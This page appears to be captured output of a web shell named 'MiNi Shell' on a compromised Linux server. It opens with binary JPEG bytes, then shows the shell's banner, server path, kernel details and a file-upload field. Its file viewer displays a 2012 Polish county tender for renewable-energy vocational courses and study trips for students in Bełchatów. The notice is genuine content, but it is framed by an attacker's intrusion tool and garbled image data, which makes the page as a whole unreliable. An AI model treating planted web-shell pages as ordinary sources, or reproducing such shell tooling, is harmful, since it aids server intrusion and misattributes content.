JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120718/256842-N-2012.html

<p class="kh_header"><b>Bełchatów: Realizacja zajęć dodatkowych, organizacja uczniowskich praktyk zawodowych w przedsiębiorstwach oraz wyjazdów studyjnych dla uczniów Zespołu Szkół Ponadgimnazjalnych  nr 3 w Bełchatowie w ramach projektu Podniesienie kwalifikacji zawodowych uczniów w zakresie urządzeń i systemów energetyki odnawialnej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 256842 - 2012; data zamieszczenia: 18.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-belchatowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zajęć dodatkowych, organizacja uczniowskich praktyk zawodowych w przedsiębiorstwach oraz wyjazdów studyjnych dla uczniów Zespołu Szkół Ponadgimnazjalnych  nr 3 w Bełchatowie w ramach projektu Podniesienie kwalifikacji zawodowych uczniów w zakresie urządzeń i systemów energetyki odnawialnej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zajęcia dodatkowe 
- przeprowadzenie 1 128 godzin lekcyjnych zajęć dodatkowych, w tym:
1) Energetyka odnawialna - 488 godzin lekcyjnych (część teoretyczna 200 h i część praktyczna 288 h)  w dwóch edycjach po 2 grupy, każda grupa po 15 osób -  opartych o wytyczne znajdujące się w podstawie programowej kształcenia w zawodzie Technik urządzeń i systemów EO (MEN, Warszawa 2010) składających się z 3 modułów: Podstawy energetyki (rodzaje źródeł energii odnawialnej, możliwości wykorzystania OZE, perspektywy rozwoju, stan zasobów, przepisy prawne, itp.), Systemy energetyki odnawialnej (charakterystyka i możliwości ich wykorzystania, rodzaje i zasady działania itp.), Technologia (BHP, zasady doboru i montażu instalacji OZE, zasady ich eksploatacji itp.). Uczestnicy projektu na zakończenie zajęć winni otrzymać zaświadczenie o ukończeniu kursu, natomiast po pozytywnym zdaniu egzaminu przed komisją złożoną z ekspertów w zakresie OZE - certyfikat.
2) 320 godzin lekcyjnych zajęć z  języka obcego - języka angielskiego (podział zajęć na grupy w zależności od poziomu zaawansowania w dwóch edycjach po 4 grupy, po uprzednim przeprowadzeniu testu sprawdzającego) - zagadnienia związane z kształtowaniem umiejętności komunikacji w języku angielskim oraz nauka słownictwa branżowego związanego z budownictwem i OZE.
3) 80 godzin lekcyjnych zajęć z przedsiębiorczości - w dwóch edycjach po 2 grupy, każda grupa po 15 osób - blok obejmujący m.in. aspekty prawne, marketingowe, finansowe funkcjonowania przedsiębiorstw, zatrudnienie, poszukiwanie pracy, doskonalenie zawodowe, prawa i obowiązki pracownika i pracodawcy, przepisy prawa w zakresie działalności gospodarczej.
4) 40 godzin lekcyjnych zajęć w zakresie kompetencji pracowniczych i umiejętności osobistych - w dwóch edycjach po 2 grupy, każda grupa po 15 osób - rozwijające kompetencje miękkie: kształtowanie zdolności interpersonalnych i komunikacyjnych, umiejętności radzenia sobie ze stresem, rozwiązywania problemów  w miejscu pracy.
5) 200 godzin lekcyjnych zajęć z zakresu branżowego IT - w dwóch edycjach po 2 grupy, każda grupa po 15 osób - rozwijających umiejętności posługiwania się specjalistycznymi oprogramowaniami komputerowymi w projektowaniu instalacji i doboru systemów energetyki odnawialnej.
- zakup w ramach zajęć Energetyka odnawialna:
1) materiałów szkoleniowych dla 60 uczestników zajęć w tym: książka o tematyce związanej z odnawialnymi źródłami energii, notatnik, segregator oraz długopis. Wyżej wymienione materiały winne być oznaczone zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach PO KL
2) materiałów specjalistycznych niezbędnych do przeprowadzenia zajęć praktycznych, w tym zakup: peletów (z trocin oraz prasowanej słomy), drewna wysokoenergetycznego, termopary, klejów termicznych do klejenia rur instalacyjnych, cyny do lutowania, liczników ilości ciepła, ilości energii elektrycznej, przepływu gazu, butli gazowych LPG, urządzeń do odbioru energii, glikolu, okablowania do odprowadzania energii, zaciskarek         i zgrzewarek do rur, kompletów szczęk do zaciskarek, nożyc do cięcia bezzadrowego, automatów gwintujących itp.
3) materiałów technicznych jednokrotnego użytku w ilości niezbędnej do przeprowadzenia zajęć praktycznych Energetyka odnawialna w tym m.in.: złączki, rury instalacyjne, plastikowe i miedziane o różnym przekroju, nyple, kolanka, trójniki, zawory spustowe, reduktory, odpowietrzniki, śrubunki proste i kątowe itp.
4) odzieży ochronnej i środków ochrony osobistej dla 60 uczestników kursu Energetyka odnawialna, w tym m.in. koszulka typu polo, bezrękawnik, bluza, spodnie ogrodniczki, rękawice ochronne, gogle chroniące oczy itp.
5) książek tematycznie związanych z OZE w celu stworzenia Szkolnej Biblioteki OZE - 120 egzemplarzy (40 tytułów).
- zakup materiałów szkoleniowych w ramach zajęć Język obcy - język angielski dla 60 uczestników projektu, w tym podręcznika i zeszytu ćwiczeń,
- zakup specjalistycznego oprogramowania komputerowego wraz z licencjami na 15 stanowisk używanego w pracy instalatorów związanych z OZE,
  - zapewnienie transportu 60 uczestnikom (2 edycje x 2 grupy x 15 osób) na zajęcia praktyczne w ramach kursu Energetyka odnawialna,
- zapewnienie suszu konferencyjnego 60 uczestnikom podczas zajęć dodatkowych w tym m.in.: kawę, herbatę, ciasteczka ciasto, wodę mineralną gazowaną niegazowaną. 
W ramach zajęć: Energetyka odnawialna, Język obcy - Język angielski, Przedsiębiorczość, Kompetencje pracownicze i umiejętności osobiste wykładowca winien korzystać z innych materiałów, niż zakupione na potrzeby realizacji projektu. Każdorazowo przed wykorzystaniem ich na zajęciach przekazuje Zamawiającemu materiały celem wykonania kopii dla uczestników projektu do Biura Projektu, co najmniej na dwa dni robocze przed planowanymi zajęciami.
- zapewnienie sali wykładowej (laboratorium) na potrzeby przeprowadzenia zajęć praktycznych bloku Energetyka odnawialna, które powinny odbywać się w ośrodku kształcenia praktycznego, wyposażonym w: materiały instalacyjne, stanowisko wyposażone w sprzęt i narzędzia do trasowania, cięcia, gięcia, gwintowania i wiercenia, stanowisko wyposażone w sprzęt i narzędzia do wykonywania połączeń gwintowanych, lutowanych, zgrzewanych, spawanych, klejonych i zaciskanych, stanowisko wyposażone w sprzęt i narzędzia do wykonywania instalacji elektrycznych oraz fotowoltaicznych, stanowisko wyposażone w sprzęt i narzędzia do wykonywania instalacji zawierających kolektory słoneczne, moduły fotowoltaiczne, pompy ciepła i kotły opalane biomasą, urządzenia do automatycznego sterowania systemami energetyki odnawialnej wyposażone w sterowniki, regulatory oraz aparaturę pomiarową)
Zajęcia dodatkowe (z wyjątkiem zajęć w ramach części praktycznej bloku Energetyka odnawialna) będą odbywały się w pomieszczeniach Zespołu Szkół Ponadgimnazjalnych    Nr 3 w Bełchatowie, zaraz po zajęciach szkolnych i w sposób nie kolidujący z nimi. 
2. Praktyki uczniowskie 
 przeprowadzenie 320 godzin zegarowych uczniowskich praktyk zawodowych, w dwóch edycjach, każda po 30 osób przez 20 dni w przedsiębiorstwach instalacyjnych z powiatu bełchatowskiego, związanych z odnawialnymi źródłami energii, z uwzględnieniem kosztów koordynatora praktyk oraz opiekuna praktyk w danym przedsiębiorstwie.
Transport uczestników projektu na praktyki zawodowe odbywał się będzie środkami komunikacji publicznej, koszt transportu nie obejmuje przedmiotu zamówienia.
3. Organizacja wyjazdów studyjnych
-   zorganizowanie na terenie woj. łódzkiego 10 całodniowych wyjazdów studyjnych dla 60 uczestników projektu, w dwóch edycjach, każda po 30 osób, umożliwiających poznanie nowoczesnych rozwiązań w zakresie OZE, jak również obejrzenie pracujących w rzeczywistych warunkach urządzeń i systemów energetyki odnawialnej. Proponowane wizyty studyjne: Uniejów (energia geotermalna), Kamieńsk (energia wiatrowa), Poddębice (energia słoneczna + biomasa), zbiornik Sulejowski lub Jeziorsko (energia wodna), gmina Daszyna (fotowoltaika)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (Załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca    spełnia  lub  nie spełnia  poszczególnych  warunków  na  podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (Załącznik nr 1 do formularza oferty) oraz wykaże,              że wykonuje w przypadku świadczeń okresowych lub ciągłych/wykonał w ciągu ostatnich trzech lat przed upływem terminu składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu co najmniej trzy usługi organizacji zajęć z tematyki obejmującej przedmiot zamówienia ze szczególnym uwzględnieniem szkoleń z zakresu odnawialnych źródeł energii, efektywności energetycznej i audytów energetycznych oraz że usługi te zostały wykonane lub są wykonywane należycie (załącznik 4 do formularza oferty).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  wykaże, że dysponuje zapleczem technicznym do przeprowadzenia praktycznej części kursu Energetyka odnawialna, tj. posiada odpowiednio wyposażone laboratorium do przeprowadzenia zajęć praktycznych zgodnie z przedłożonym oświadczeniem na druku stanowiącym załącznik nr 5 do formularza oferty. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca    spełnia  lub  nie spełnia  poszczególnych  warunków  na  podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży oświadczenie (Załącznik nr 3 do formularza oferty), że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają odpowiednie kwalifikacje i doświadczenie do prowadzenia kursu. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca    spełnia  lub  nie spełnia  poszczególnych  warunków  na  podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p. (Załącznik nr 1 do formularza oferty). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca    spełnia  lub  nie spełnia  poszczególnych  warunków  na  podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana Umowy po jej zawarciu jest dopuszczalna, o ile nie jest zmianą Umowy w stosunku do treści oferty złożonej przez Wykonawcę, z zastrzeżeniem pkt. 4.
4. Zmiana postanowień zawartej Umowy po jej zawarciu w stosunku do treści oferty złożonej przez Wykonawcę jest dopuszczalna przy zachowaniu następujących warunków:
1) przedmiotu zamówienia, pod warunkiem, że będą one na korzyść Zamawiającego albo zaszły okoliczności których nie można było przewidzieć w chwili zawarcia Umowy, 
2)  terminu wykonania umowy,  pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności:
a) w następstwie wykraczających poza terminy określone w Kodeksie Postępowania Administracyjnego procedur administracyjnych oraz innych terminów formalno - prawnych mających wpływ na terminy realizacji zamówienia,
b) działania siły wyższej.
3) wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla Zamawiającego lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu zamówienia.
4)Zamawiający  postanowił zmienić zakres realizowanego zamówienia bądź inne         postanowienia Umowy ze względu na nowe okoliczności, o których nie wiedział zawierając Umowę .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.e-bip.pl/start/46  - Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bełchatowie, Wydział Promocji i Rozwoju Powiatu, ul. Czapliniecka 96, 97-400 Bełchatów, pok.5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Bełchatowie, ul. Pabianicka 17/19, 97-400 Bełchatów, sekretariat, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com